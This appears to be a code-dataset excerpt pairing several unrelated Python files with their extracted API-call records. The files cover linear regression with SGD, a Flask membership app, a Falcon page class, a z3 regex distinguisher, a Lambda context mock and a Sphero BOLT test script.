def mse_loss(y_pred, y_true):
'''
Calculate mean squared error
'''
m = y_pred.size
errors = y_pred - y_true
mse = 1/m * np.dot(errors.T, errors)
return mse
@staticmethod
def plot_loss(losses):
'''
Plot losses
'''
plt.figure()
plt.ylabel('Cost')
plt.xlabel('Epoch')
plt.plot(losses)
plt.show()
def _update_params(self, w, b):
'''
Update parameters
'''
self.w = w
self.b = b
return w, b
def score(self, y_pred, y_true):
'''
Calculate R2 score
'''
u = np.dot((y_pred - y_true).T, (y_pred - y_true))
y_true_mean = np.full(y_true.shape, np.mean(y_true))
v = np.dot((y_true_mean - y_true).T, (y_true_mean - y_true))
R2 = 1 - u/v
return R2
class SGDOptimiser:
def __init__(self, alpha, epochs):
self.alpha = alpha
self.epochs = epochs
def _calc_deriv(self, X, y_pred, y_true):
'''
Calculate derivate of mean square error(loss) with respect to parameters
'''
m = y_pred.size
errors = y_pred - y_true
dLdw = 2/m * np.sum(X.T * errors).T
print('dLdw',dLdw)
dLdb = 2/m * np.sum(errors)
print('dLdb',dLdb)
return dLdw, dLdb
def step(self, w, b, X, y_pred, y_true):
'''
Calculate updated paramters to decrease mean square error
'''
dLdw, dLdb = self._calc_deriv(X, y_pred, y_true)
new_w = w - self.alpha * dLdw
new_b = b - self.alpha * dLdb
return new_w, new_b
class DataLoader:
def __init__(self, X, y):
idx = np.random.permutation(X.shape[0])
self.X = X[idx]
self.y = y[idx]
def yield_data(self, n):
X_yield = self.X[0:n+1]
y_yield = self.y[0:n+1]
self.X = self.X[n+1:]
self.y = self.y[n+1:]
return X_yield, y_yield
def add_data(self, X_new, y_new):
self.X = np.append(X, X_new)
self.y = np.append(y, y_new)
#%%
np.random.seed(2)
X, y = datasets.fetch_california_housing(return_X_y=True)
scaler = preprocessing.StandardScaler()
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3)
X_test, X_val, y_test, y_val = train_test_split(X_test, y_test, test_size=0.5)
X_train = scaler.fit_transform(X_train)
X_test = scaler.transform(X_test)
X_val = scaler.transform(X_val)
np.random.seed(2)
epochs = 1000
a = 0.001
optimiser = SGDOptimiser(alpha=a, epochs=epochs)
model = LinearRegression(optimiser=optimiser, n_features=X_train.shape[1])
model.fit(X_train, y_train)
y_pred = model.predict(X_train)
score = model.score(y_pred,y_train)
print(score)
# %%
# %%
|
[
"numpy.random.seed",
"sklearn.preprocessing.StandardScaler",
"matplotlib.pyplot.plot",
"numpy.random.randn",
"matplotlib.pyplot.show",
"sklearn.model_selection.train_test_split",
"numpy.sum",
"sklearn.datasets.fetch_california_housing",
"numpy.append",
"matplotlib.pyplot.figure",
"numpy.mean",
"numpy.random.permutation",
"numpy.dot",
"matplotlib.pyplot.ylabel",
"matplotlib.pyplot.xlabel"
] |
[((3275, 3292), 'numpy.random.seed', 'np.random.seed', (['(2)'], {}), '(2)\n', (3289, 3292), True, 'import numpy as np\n'), ((3300, 3350), 'sklearn.datasets.fetch_california_housing', 'datasets.fetch_california_housing', ([], {'return_X_y': '(True)'}), '(return_X_y=True)\n', (3333, 3350), False, 'from sklearn import datasets, linear_model, metrics, preprocessing\n'), ((3360, 3390), 'sklearn.preprocessing.StandardScaler', 'preprocessing.StandardScaler', ([], {}), '()\n', (3388, 3390), False, 'from sklearn import datasets, linear_model, metrics, preprocessing\n'), ((3426, 3463), 'sklearn.model_selection.train_test_split', 'train_test_split', (['X', 'y'], {'test_size': '(0.3)'}), '(X, y, test_size=0.3)\n', (3442, 3463), False, 'from sklearn.model_selection import train_test_split\n'), ((3495, 3542), 'sklearn.model_selection.train_test_split', 'train_test_split', (['X_test', 'y_test'], {'test_size': '(0.5)'}), '(X_test, y_test, test_size=0.5)\n', (3511, 3542), False, 'from sklearn.model_selection import train_test_split\n'), ((3650, 3667), 'numpy.random.seed', 'np.random.seed', (['(2)'], {}), '(2)\n', (3664, 3667), True, 'import numpy as np\n'), ((308, 325), 'numpy.random.seed', 'np.random.seed', (['(2)'], {}), '(2)\n', (322, 325), True, 'import numpy as np\n'), ((343, 370), 'numpy.random.randn', 'np.random.randn', (['n_features'], {}), '(n_features)\n', (358, 370), True, 'import numpy as np\n'), ((388, 405), 'numpy.random.randn', 'np.random.randn', ([], {}), '()\n', (403, 405), True, 'import numpy as np\n'), ((1470, 1482), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (1480, 1482), True, 'import matplotlib.pyplot as plt\n'), ((1491, 1509), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Cost"""'], {}), "('Cost')\n", (1501, 1509), True, 'import matplotlib.pyplot as plt\n'), ((1518, 1537), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Epoch"""'], {}), "('Epoch')\n", (1528, 1537), True, 'import matplotlib.pyplot as plt\n'), ((1546, 1562), 'matplotlib.pyplot.plot', 'plt.plot', (['losses'], {}), '(losses)\n', (1554, 1562), True, 'import matplotlib.pyplot as plt\n'), ((1571, 1581), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (1579, 1581), True, 'import matplotlib.pyplot as plt\n'), ((1828, 1872), 'numpy.dot', 'np.dot', (['(y_pred - y_true).T', '(y_pred - y_true)'], {}), '((y_pred - y_true).T, y_pred - y_true)\n', (1834, 1872), True, 'import numpy as np\n'), ((1948, 2002), 'numpy.dot', 'np.dot', (['(y_true_mean - y_true).T', '(y_true_mean - y_true)'], {}), '((y_true_mean - y_true).T, y_true_mean - y_true)\n', (1954, 2002), True, 'import numpy as np\n'), ((2889, 2922), 'numpy.random.permutation', 'np.random.permutation', (['X.shape[0]'], {}), '(X.shape[0])\n', (2910, 2922), True, 'import numpy as np\n'), ((3213, 3232), 'numpy.append', 'np.append', (['X', 'X_new'], {}), '(X, X_new)\n', (3222, 3232), True, 'import numpy as np\n'), ((3250, 3269), 'numpy.append', 'np.append', (['y', 'y_new'], {}), '(y, y_new)\n', (3259, 3269), True, 'import numpy as np\n'), ((1084, 1101), 'numpy.dot', 'np.dot', (['X', 'self.w'], {}), '(X, self.w)\n', (1090, 1101), True, 'import numpy as np\n'), ((1328, 1352), 'numpy.dot', 'np.dot', (['errors.T', 'errors'], {}), '(errors.T, errors)\n', (1334, 1352), True, 'import numpy as np\n'), ((1919, 1934), 'numpy.mean', 'np.mean', (['y_true'], {}), '(y_true)\n', (1926, 1934), True, 'import numpy as np\n'), ((2461, 2475), 'numpy.sum', 'np.sum', (['errors'], {}), '(errors)\n', (2467, 2475), True, 'import numpy as np\n'), ((2390, 2410), 'numpy.sum', 'np.sum', (['(X.T * errors)'], {}), '(X.T * errors)\n', (2396, 2410), True, 'import numpy as np\n')]
|
#----------------------------------------------------------------------------#
# Imports
#----------------------------------------------------------------------------#
from flask import Flask, redirect, render_template, request, url_for
import logging
from logging import Formatter, FileHandler
from forms import *
import os
from geekie_api_client import GeekieAPIClient
from geekie_oauth import OAuthClient
#----------------------------------------------------------------------------#
# App Config.
#----------------------------------------------------------------------------#
app = Flask(__name__)
app.config.from_object("config")
app.config["geekie_api_client"] = GeekieAPIClient(
shared_secret=app.config.get("GEEKIE_API_SHARED_SECRET"),
)
#----------------------------------------------------------------------------#
# Controllers.
#----------------------------------------------------------------------------#
@app.route("/")
def home():
return render_template("pages/home.html")
@app.route("/who-am-i", methods=["POST"])
def who_am_i():
api_client = app.config.get("geekie_api_client")
remote_organization_id = api_client.who_am_i(request.form["organization_id"]).get(
"organization_id"
)
return redirect(url_for("show_organization", organization_id=remote_organization_id))
@app.route("/organizations/<organization_id>")
def show_organization(organization_id):
return render_template("pages/show_organization.html", organization_id=organization_id)
@app.route("/organizations/<organization_id>/members")
def list_organization_memberships(organization_id):
api_client = app.config.get("geekie_api_client")
api_response = api_client.get_all_memberships(organization_id)
memberships = api_response["results"]
oauth_params = {}
for membership in memberships:
oauth_client = OAuthClient(
shared_secret=app.config.get("GEEKIE_API_SHARED_SECRET"),
organization_id=organization_id,
user_id=membership["id"]
)
oauth_params[membership["id"]] = oauth_client.get_oauth_params()
return render_template(
"pages/members.html",
organization_id=organization_id,
memberships=memberships,
oauth_params=oauth_params,
)
@app.route("/organizations/<organization_id>/memberships", methods=["POST"])
def create_membership(organization_id):
api_client = app.config.get("geekie_api_client")
form_data = request.form
membership_data = {
"full_name": form_data["full_name"],
}
api_client.create_membership(
organization_id=organization_id,
membership_data=membership_data
)
return redirect(
url_for("list_organization_memberships", organization_id=organization_id)
)
@app.route("/organizations/<organization_id>/memberships/<membership_id>/edit", methods=["GET"])
def edit_membership(organization_id, membership_id):
api_client = app.config.get("geekie_api_client")
membership = api_client.get_membership(organization_id, membership_id)
return render_template(
"pages/edit_member.html",
organization_id=organization_id,
membership_id=membership_id,
membership=membership,
)
@app.route("/organizations/<organization_id>/memberships/<membership_id>", methods=["POST"])
def update_membership(organization_id, membership_id):
api_client = app.config.get("geekie_api_client")
form_data = request.form
membership_data = {
"content_group_ids": [],
"full_name": form_data["full_name"],
"roles": form_data["roles"].split(", "),
"tags": form_data["tags"].split(", "),
"deleted": form_data.get("deleted", "false"),
"external_id": form_data.get("external_id", ""),
}
api_client.update_membership(
organization_id=organization_id,
membership_id=membership_id,
membership_data=membership_data,
)
return redirect(
url_for("list_organization_memberships", organization_id=organization_id)
)
# Error handlers.
@app.errorhandler(500)
def internal_error(error):
#db_session.rollback()
return render_template("errors/500.html"), 500
@app.errorhandler(404)
def not_found_error(error):
return render_template("errors/404.html"), 404
if not app.debug:
file_handler = FileHandler("error.log")
file_handler.setFormatter(
Formatter("%(asctime)s %(levelname)s: %(message)s [in %(pathname)s:%(lineno)d]")
)
app.logger.setLevel(logging.INFO)
file_handler.setLevel(logging.INFO)
app.logger.addHandler(file_handler)
app.logger.info("errors")
#----------------------------------------------------------------------------#
# Launch.
#----------------------------------------------------------------------------#
# Default port:
if __name__ == "__main__":
app.run()
# Or specify port manually:
"""
if __name__ == "__main__":
port = int(os.environ.get("PORT", 5000))
app.run(host="0.0.0.0", port=port)
"""
|
[
"logging.FileHandler",
"flask.Flask",
"logging.Formatter",
"flask.url_for",
"flask.render_template"
] |
[((590, 605), 'flask.Flask', 'Flask', (['__name__'], {}), '(__name__)\n', (595, 605), False, 'from flask import Flask, redirect, render_template, request, url_for\n'), ((968, 1002), 'flask.render_template', 'render_template', (['"""pages/home.html"""'], {}), "('pages/home.html')\n", (983, 1002), False, 'from flask import Flask, redirect, render_template, request, url_for\n'), ((1427, 1512), 'flask.render_template', 'render_template', (['"""pages/show_organization.html"""'], {'organization_id': 'organization_id'}), "('pages/show_organization.html', organization_id=organization_id\n )\n", (1442, 1512), False, 'from flask import Flask, redirect, render_template, request, url_for\n'), ((2121, 2247), 'flask.render_template', 'render_template', (['"""pages/members.html"""'], {'organization_id': 'organization_id', 'memberships': 'memberships', 'oauth_params': 'oauth_params'}), "('pages/members.html', organization_id=organization_id,\n memberships=memberships, oauth_params=oauth_params)\n", (2136, 2247), False, 'from flask import Flask, redirect, render_template, request, url_for\n'), ((3086, 3216), 'flask.render_template', 'render_template', (['"""pages/edit_member.html"""'], {'organization_id': 'organization_id', 'membership_id': 'membership_id', 'membership': 'membership'}), "('pages/edit_member.html', organization_id=organization_id,\n membership_id=membership_id, membership=membership)\n", (3101, 3216), False, 'from flask import Flask, redirect, render_template, request, url_for\n'), ((4362, 4386), 'logging.FileHandler', 'FileHandler', (['"""error.log"""'], {}), "('error.log')\n", (4373, 4386), False, 'from logging import Formatter, FileHandler\n'), ((1257, 1325), 'flask.url_for', 'url_for', (['"""show_organization"""'], {'organization_id': 'remote_organization_id'}), "('show_organization', organization_id=remote_organization_id)\n", (1264, 1325), False, 'from flask import Flask, redirect, render_template, request, url_for\n'), ((2713, 2786), 'flask.url_for', 'url_for', (['"""list_organization_memberships"""'], {'organization_id': 'organization_id'}), "('list_organization_memberships', organization_id=organization_id)\n", (2720, 2786), False, 'from flask import Flask, redirect, render_template, request, url_for\n'), ((3990, 4063), 'flask.url_for', 'url_for', (['"""list_organization_memberships"""'], {'organization_id': 'organization_id'}), "('list_organization_memberships', organization_id=organization_id)\n", (3997, 4063), False, 'from flask import Flask, redirect, render_template, request, url_for\n'), ((4180, 4214), 'flask.render_template', 'render_template', (['"""errors/500.html"""'], {}), "('errors/500.html')\n", (4195, 4214), False, 'from flask import Flask, redirect, render_template, request, url_for\n'), ((4284, 4318), 'flask.render_template', 'render_template', (['"""errors/404.html"""'], {}), "('errors/404.html')\n", (4299, 4318), False, 'from flask import Flask, redirect, render_template, request, url_for\n'), ((4426, 4511), 'logging.Formatter', 'Formatter', (['"""%(asctime)s %(levelname)s: %(message)s [in %(pathname)s:%(lineno)d]"""'], {}), "('%(asctime)s %(levelname)s: %(message)s [in %(pathname)s:%(lineno)d]'\n )\n", (4435, 4511), False, 'from logging import Formatter, FileHandler\n')]
|
import os
from falcon import falcon
from settings.settings import SETTINGS
from chameleon import PageTemplateLoader
class BasePage(object):
"""
Generic base page object
"""
model = None
property_types = []
default_404 = SETTINGS['VIEWS']['DEFAULT_404_TEMPLATE']
templates_dir = 'templates/'
template = 'index.html'
data = {}
allowed_methods = ['GET']
group_access = SETTINGS['PERMISSIONS']['GROUPS']
def load_templates(self, base_dir=None):
"""
Loads the specified templates
Args:
base_dir: string|None
Returns:
"""
base_dir_path = base_dir if base_dir else self.templates_dir
app_path = os.path.abspath(base_dir_path)
return PageTemplateLoader(app_path)
def get_data(self, req):
"""
Method to override for data retrieval
Args:
req: object
Returns: mixed
"""
return self.data
def __forbidden_handler__(self, req, resp):
"""
Default forbidden case handler.
Explanation: As this is the BasePage super class
anything except GET should be forbidden you should use
BaseResource instead of page and create a proper REST api
Args:
req:
resp:
Returns:
"""
templates = self.load_templates(base_dir="/templates")
template = templates[self.default_404]
resp.status = falcon.HTTP_404
resp.content_type = "text/html"
data = {
'req': req
}
resp.body = (template(data=data))
def on_get(self, req, resp):
"""
Default HTTP GET method definition
Args:
req: object
resp: object
Returns:
"""
data = self.get_data(req)
templates = self.load_templates()
try:
template = templates[self.template]
except ValueError as val:
self.__forbidden_handler__(req, resp)
resp.status = falcon.HTTP_200
resp.content_type = "text/html"
resp.body = (template(data=data))
def on_post(self, req, resp):
"""
Default POST http method handler
Args:
req:
resp:
Returns:
"""
self.__forbidden_handler__(req, resp)
def on_put(self, req, resp):
"""
Default PUT http method handler
Args:
req:
resp:
Returns:
"""
self.__forbidden_handler__(req, resp)
def on_delete(self, req, resp):
"""
Default DELETE http method handler
Args:
req:
resp:
Returns:
"""
self.__forbidden_handler__(req, resp)
def on_patch(self, req, resp):
"""
Default PATCH http method handler
Args:
req:
resp:
Returns:
"""
self.__forbidden_handler__(req, resp)
|
[
"os.path.abspath",
"chameleon.PageTemplateLoader"
] |
[((709, 739), 'os.path.abspath', 'os.path.abspath', (['base_dir_path'], {}), '(base_dir_path)\n', (724, 739), False, 'import os\n'), ((755, 783), 'chameleon.PageTemplateLoader', 'PageTemplateLoader', (['app_path'], {}), '(app_path)\n', (773, 783), False, 'from chameleon import PageTemplateLoader\n')]
|
import matplotlib.pyplot as plt
import random
if __name__ == '__main__':
random.seed(9)
length = 100
A = 5
B = .2
C = 1
trend = [A + B * i for i in range(length)]
noise = []
for i in range(length):
if 65 <= i <= 75:
noise.append(7 * C * random.gauss(0, 1))
plt.axvspan(i, i + 1, color = 'red', alpha = 0.1)
else:
noise.append(C * random.gauss(0, 1))
ts = [trend[i] + noise[i] for i in range(length)]
plt.plot(ts)
plt.xticks([])
plt.yticks([])
plt.show()
|
[
"matplotlib.pyplot.show",
"matplotlib.pyplot.plot",
"matplotlib.pyplot.yticks",
"matplotlib.pyplot.axvspan",
"random.seed",
"random.gauss",
"matplotlib.pyplot.xticks"
] |
[((79, 93), 'random.seed', 'random.seed', (['(9)'], {}), '(9)\n', (90, 93), False, 'import random\n'), ((495, 507), 'matplotlib.pyplot.plot', 'plt.plot', (['ts'], {}), '(ts)\n', (503, 507), True, 'import matplotlib.pyplot as plt\n'), ((512, 526), 'matplotlib.pyplot.xticks', 'plt.xticks', (['[]'], {}), '([])\n', (522, 526), True, 'import matplotlib.pyplot as plt\n'), ((531, 545), 'matplotlib.pyplot.yticks', 'plt.yticks', (['[]'], {}), '([])\n', (541, 545), True, 'import matplotlib.pyplot as plt\n'), ((550, 560), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (558, 560), True, 'import matplotlib.pyplot as plt\n'), ((323, 368), 'matplotlib.pyplot.axvspan', 'plt.axvspan', (['i', '(i + 1)'], {'color': '"""red"""', 'alpha': '(0.1)'}), "(i, i + 1, color='red', alpha=0.1)\n", (334, 368), True, 'import matplotlib.pyplot as plt\n'), ((291, 309), 'random.gauss', 'random.gauss', (['(0)', '(1)'], {}), '(0, 1)\n', (303, 309), False, 'import random\n'), ((416, 434), 'random.gauss', 'random.gauss', (['(0)', '(1)'], {}), '(0, 1)\n', (428, 434), False, 'import random\n')]
|
import random
import re
import time
from itertools import combinations
import z3
from forest.logger import get_logger
from forest.utils import check_conditions
from forest.visitor import ToZ3, RegexInterpreter
logger = get_logger('forest')
use_derivatives = True
# z3.set_param('smt.string_solver', 'z3str3')
class RegexDistinguisher:
def __init__(self):
self._toz3 = ToZ3()
self._printer = RegexInterpreter()
self.force_multi_distinguish = False
self.force_distinguish2 = False
def distinguish(self, programs):
logger.debug(f"Distinguishing {len(programs)}: "
f"{','.join(map(self._printer.eval, programs))}")
assert len(programs) >= 2
if not self.force_multi_distinguish and len(programs) == 2:
return self.distinguish2(programs[0], programs[1])
if self.force_distinguish2:
dist_input, keep_if_valid, keep_if_invalid, _ = \
self.distinguish2(programs[0], programs[1])
return dist_input, keep_if_valid, keep_if_invalid, programs[2:]
else:
return self.multi_distinguish(programs)
def distinguish2(self, r1, r2):
global use_derivatives
solver = z3.Solver()
solver.set('random_seed', 7)
solver.set('sat.random_seed', 7)
if use_derivatives:
try:
solver.set('smt.seq.use_derivatives', True)
solver.check()
except:
pass
z3_r1 = self._toz3.eval(r1[0])
z3_r2 = self._toz3.eval(r2[0])
dist = z3.String("distinguishing")
ro_1 = z3.Bool(f"ro_1")
solver.add(ro_1 == z3.InRe(dist, z3_r1))
ro_2 = z3.Bool(f"ro_2")
solver.add(ro_2 == z3.InRe(dist, z3_r2))
solver.add(ro_1 != ro_2)
if solver.check() == z3.sat:
if len(r1[2][0]) == 0 and len(r2[2][0]) == 0:
dist_input = solver.model()[dist].as_string()
if solver.model()[ro_1]:
return dist_input, [r1], [r2], []
else:
return dist_input, [r2], [r1], []
# Find dist_input that respects conditions
r1_str = self._printer.eval(r1[0], captures=r1[2][1])
r1_conditions = list(map(lambda c: " ".join(map(str, c)), r1[2][0]))
r2_str = self._printer.eval(r2[0], captures=r2[2][1])
r2_conditions = list(map(lambda c: " ".join(map(str, c)), r2[2][0]))
while True:
dist_input = solver.model()[dist].as_string()
match = re.fullmatch(r1_str, dist_input)
if match is not None and check_conditions(r1_conditions, match):
break
match = re.fullmatch(r2_str, dist_input)
if match is not None and check_conditions(r2_conditions, match):
break
solver.add(dist != z3.StringVal(dist_input))
if not solver.check() == z3.sat:
return None, None, None, None
if solver.model()[ro_1]:
return dist_input, [r1], [r2], []
else:
return dist_input, [r2], [r1], []
else:
return None, None, None, None
def multi_distinguish(self, regexes):
start = time.time()
# Problem: cannot distinguish more than 4 regexes at once: it takes forever.
# Solution: use only 4 randomly selected regexes for the SMT maximization,
# and then add the others to the solution.
if len(regexes) <= 4:
selected_regexes = regexes
others = []
else:
random.seed('regex')
random.shuffle(regexes)
selected_regexes = regexes[:4]
others = regexes[4:]
solver = z3.Optimize()
z3_regexes = []
for regex in selected_regexes:
z3_regex = self._toz3.eval(regex)
z3_regexes.append(z3_regex)
dist = z3.String("distinguishing")
# solver.add(z3.Length(dist) <= 6)
ro_z3 = []
for i, z3_regex in enumerate(z3_regexes):
ro = z3.Bool(f"ro_{i}")
ro_z3.append(ro)
solver.add(ro == z3.InRe(dist, z3_regex))
# ro_z3[i] == true if dist matches regex[i].
big_or = []
for ro_i, ro_j in combinations(ro_z3, 2):
big_or.append(z3.Xor(ro_i, ro_j))
solver.add_soft(z3.Xor(ro_i, ro_j))
solver.add(z3.Or(big_or)) # at least one regex is distinguished
if solver.check() == z3.sat:
# print(solver.model())
print("took", round(time.time() - start, 2), "seconds")
keep_if_valid = []
keep_if_invalid = []
dist_input = str(solver.model()[dist]).strip('"')
for i, ro in enumerate(ro_z3):
if solver.model()[ro]:
keep_if_valid.append(selected_regexes[i])
else:
keep_if_invalid.append(selected_regexes[i])
smallest_regex = min(selected_regexes, key=lambda r: len(self._printer.eval(r)))
return dist_input, keep_if_valid, keep_if_invalid, others
else:
return None, None, None, None
|
[
"re.fullmatch",
"z3.Xor",
"random.shuffle",
"z3.Optimize",
"forest.visitor.RegexInterpreter",
"z3.String",
"time.time",
"itertools.combinations",
"random.seed",
"z3.Solver",
"forest.visitor.ToZ3",
"z3.Or",
"z3.StringVal",
"z3.InRe",
"forest.logger.get_logger",
"z3.Bool",
"forest.utils.check_conditions"
] |
[((222, 242), 'forest.logger.get_logger', 'get_logger', (['"""forest"""'], {}), "('forest')\n", (232, 242), False, 'from forest.logger import get_logger\n'), ((386, 392), 'forest.visitor.ToZ3', 'ToZ3', ([], {}), '()\n', (390, 392), False, 'from forest.visitor import ToZ3, RegexInterpreter\n'), ((417, 435), 'forest.visitor.RegexInterpreter', 'RegexInterpreter', ([], {}), '()\n', (433, 435), False, 'from forest.visitor import ToZ3, RegexInterpreter\n'), ((1237, 1248), 'z3.Solver', 'z3.Solver', ([], {}), '()\n', (1246, 1248), False, 'import z3\n'), ((1599, 1626), 'z3.String', 'z3.String', (['"""distinguishing"""'], {}), "('distinguishing')\n", (1608, 1626), False, 'import z3\n'), ((1643, 1659), 'z3.Bool', 'z3.Bool', (['f"""ro_1"""'], {}), "(f'ro_1')\n", (1650, 1659), False, 'import z3\n'), ((1724, 1740), 'z3.Bool', 'z3.Bool', (['f"""ro_2"""'], {}), "(f'ro_2')\n", (1731, 1740), False, 'import z3\n'), ((3352, 3363), 'time.time', 'time.time', ([], {}), '()\n', (3361, 3363), False, 'import time\n'), ((3852, 3865), 'z3.Optimize', 'z3.Optimize', ([], {}), '()\n', (3863, 3865), False, 'import z3\n'), ((4032, 4059), 'z3.String', 'z3.String', (['"""distinguishing"""'], {}), "('distinguishing')\n", (4041, 4059), False, 'import z3\n'), ((4393, 4415), 'itertools.combinations', 'combinations', (['ro_z3', '(2)'], {}), '(ro_z3, 2)\n', (4405, 4415), False, 'from itertools import combinations\n'), ((3702, 3722), 'random.seed', 'random.seed', (['"""regex"""'], {}), "('regex')\n", (3713, 3722), False, 'import random\n'), ((3735, 3758), 'random.shuffle', 'random.shuffle', (['regexes'], {}), '(regexes)\n', (3749, 3758), False, 'import random\n'), ((4190, 4208), 'z3.Bool', 'z3.Bool', (['f"""ro_{i}"""'], {}), "(f'ro_{i}')\n", (4197, 4208), False, 'import z3\n'), ((4530, 4543), 'z3.Or', 'z3.Or', (['big_or'], {}), '(big_or)\n', (4535, 4543), False, 'import z3\n'), ((1687, 1707), 'z3.InRe', 'z3.InRe', (['dist', 'z3_r1'], {}), '(dist, z3_r1)\n', (1694, 1707), False, 'import z3\n'), ((1768, 1788), 'z3.InRe', 'z3.InRe', (['dist', 'z3_r2'], {}), '(dist, z3_r2)\n', (1775, 1788), False, 'import z3\n'), ((2615, 2647), 're.fullmatch', 're.fullmatch', (['r1_str', 'dist_input'], {}), '(r1_str, dist_input)\n', (2627, 2647), False, 'import re\n'), ((2780, 2812), 're.fullmatch', 're.fullmatch', (['r2_str', 'dist_input'], {}), '(r2_str, dist_input)\n', (2792, 2812), False, 'import re\n'), ((4443, 4461), 'z3.Xor', 'z3.Xor', (['ro_i', 'ro_j'], {}), '(ro_i, ro_j)\n', (4449, 4461), False, 'import z3\n'), ((4491, 4509), 'z3.Xor', 'z3.Xor', (['ro_i', 'ro_j'], {}), '(ro_i, ro_j)\n', (4497, 4509), False, 'import z3\n'), ((2689, 2727), 'forest.utils.check_conditions', 'check_conditions', (['r1_conditions', 'match'], {}), '(r1_conditions, match)\n', (2705, 2727), False, 'from forest.utils import check_conditions\n'), ((2854, 2892), 'forest.utils.check_conditions', 'check_conditions', (['r2_conditions', 'match'], {}), '(r2_conditions, match)\n', (2870, 2892), False, 'from forest.utils import check_conditions\n'), ((4267, 4290), 'z3.InRe', 'z3.InRe', (['dist', 'z3_regex'], {}), '(dist, z3_regex)\n', (4274, 4290), False, 'import z3\n'), ((2956, 2980), 'z3.StringVal', 'z3.StringVal', (['dist_input'], {}), '(dist_input)\n', (2968, 2980), False, 'import z3\n'), ((4690, 4701), 'time.time', 'time.time', ([], {}), '()\n', (4699, 4701), False, 'import time\n')]
|
import uuid
from datetime import date
import os
import humanize
class Context:
def __init__(self, function_name, function_version):
self.function_name = function_name
self.function_version = function_version
self.invoked_function_arn = "arn:aws:lambda:eu-north-1:000000000000:function:{}".format(self.function_name)
self.aws_request_id = uuid.uuid1()
self.log_group_name = "/aws/lambda/{}".format(self.function_name)
today = date.today()
self.log_stream_name = "{}/[{}]4459c970fa6d4c77aca62c95850fce54".format(today.strftime("%Y/%m/%d"), self.function_version)
self.memory_limit_in_mb = Context.memory(self)
pass
def memory(self):
mem = int(os.popen("cat /sys/fs/cgroup/memory/memory.limit_in_bytes").read())
self.memory_limit_in_mb = humanize.naturalsize(mem, gnu=True)
return (self.memory_limit_in_mb)
pass
|
[
"uuid.uuid1",
"os.popen",
"datetime.date.today",
"humanize.naturalsize"
] |
[((376, 388), 'uuid.uuid1', 'uuid.uuid1', ([], {}), '()\n', (386, 388), False, 'import uuid\n'), ((479, 491), 'datetime.date.today', 'date.today', ([], {}), '()\n', (489, 491), False, 'from datetime import date\n'), ((834, 869), 'humanize.naturalsize', 'humanize.naturalsize', (['mem'], {'gnu': '(True)'}), '(mem, gnu=True)\n', (854, 869), False, 'import humanize\n'), ((732, 791), 'os.popen', 'os.popen', (['"""cat /sys/fs/cgroup/memory/memory.limit_in_bytes"""'], {}), "('cat /sys/fs/cgroup/memory/memory.limit_in_bytes')\n", (740, 791), False, 'import os\n')]
|
# python3
#import sys
#sys.path.append('/spherov2/')
import time
from spherov2 import scanner
from spherov2.sphero_edu import EventType, SpheroEduAPI
from spherov2.types import Color
print("Testing Starting...")
print("Connecting to Bolt...")
toy = scanner.find_BOLT()
if toy is not None:
print("Connected.")
with SpheroEduAPI(toy) as droid:
print("Testing Start...")
droid.set_main_led(Color(r=0, g=255, b=0)) #Sets whole Matrix
droid.reset_aim()
droid.set_main_led(Color(r=0,g=0,b=255))
print("Luminosity: " + str(droid.get_luminosity()))
print("Accel: " + str(droid.get_acceleration()))
"""
print("Testing Main LED")
droid.set_main_led(Color(r=0, g=0, b=255)) #Sets whole Matrix
time.sleep(1)
print("Testing Front LED")
droid.set_front_led(Color(r=0, g=255, b=0)) #Sets front LED
time.sleep(1)
print("Testing Back LED")
droid.set_back_led(Color(r=255, g=0, b=0)) #Sets back LED
time.sleep(1)
print("Set Matrix Pixel")
droid.set_matrix_pixel(0, 0, Color(r=255, g=255, b=0)) #Set Matrix Pixel
time.sleep(1)
print("Set Matrix Line")
droid.set_matrix_line(1, 0, 1, 7, Color(r=255, g=0, b=255)) #Set Matrix Line
time.sleep(1)
print("Set Matrix Fill")
droid.set_matrix_fill(2, 0, 6, 6, Color(r=0, g=255, b=255)) #Set Matrix Box
time.sleep(2)
"""
droid.set_main_led(Color(r=255, g=0, b=0)) #Sets whole Matrix
print("Testing End...")
#droid.register_event(EventType.on_sensor_streaming_data, droid.SensorStreamingInfo) #how you would register to data (function name is custom)
|
[
"spherov2.sphero_edu.SpheroEduAPI",
"spherov2.scanner.find_BOLT",
"spherov2.types.Color"
] |
[((252, 271), 'spherov2.scanner.find_BOLT', 'scanner.find_BOLT', ([], {}), '()\n', (269, 271), False, 'from spherov2 import scanner\n'), ((326, 343), 'spherov2.sphero_edu.SpheroEduAPI', 'SpheroEduAPI', (['toy'], {}), '(toy)\n', (338, 343), False, 'from spherov2.sphero_edu import EventType, SpheroEduAPI\n'), ((415, 437), 'spherov2.types.Color', 'Color', ([], {'r': '(0)', 'g': '(255)', 'b': '(0)'}), '(r=0, g=255, b=0)\n', (420, 437), False, 'from spherov2.types import Color\n'), ((520, 542), 'spherov2.types.Color', 'Color', ([], {'r': '(0)', 'g': '(0)', 'b': '(255)'}), '(r=0, g=0, b=255)\n', (525, 542), False, 'from spherov2.types import Color\n'), ((1518, 1540), 'spherov2.types.Color', 'Color', ([], {'r': '(255)', 'g': '(0)', 'b': '(0)'}), '(r=255, g=0, b=0)\n', (1523, 1540), False, 'from spherov2.types import Color\n')]
|
import hashlib
import json
import sys
import time
from random import random
def custom_print(*args, sep=' ', end='\n', file=None):
"""
print补丁
:param x:
:return:
"""
# 获取被调用函数在被调用时所处代码行数
line = sys._getframe().f_back.f_lineno
# 获取被调用函数所在模块文件名
# file_name = sys._getframe(1).f_code.co_filename
# sys.stdout.write(f'"{__file__}:{sys._getframe().f_lineno}" {x}\n')
args = (str(arg) for arg in args) # REMIND 防止是数字不能被join
sys.stdout.write(f'{line}: \033[0;32m{" ".join(args)}\033[0m\n')
def create_digest(username):
KEY = b'xdf'
PERSON = b'xzz'
timestamp = time.time()
salt = str(random()).encode('utf-8')[:16]
digest = hashlib.blake2b((username + str(timestamp)).encode('utf-8'), key=KEY, salt=salt, person=PERSON).hexdigest()
return digest
# print(digest.hexdigest())
def postman_to_markdown(postmanfilename, postman_varname, postman_varname_global, markdowndocname=None):
with open(postmanfilename, 'r', encoding='UTF-8') as f1:
content = json.load(f1)
markdowndocname = content['info']['name'] + '接口文档.md'
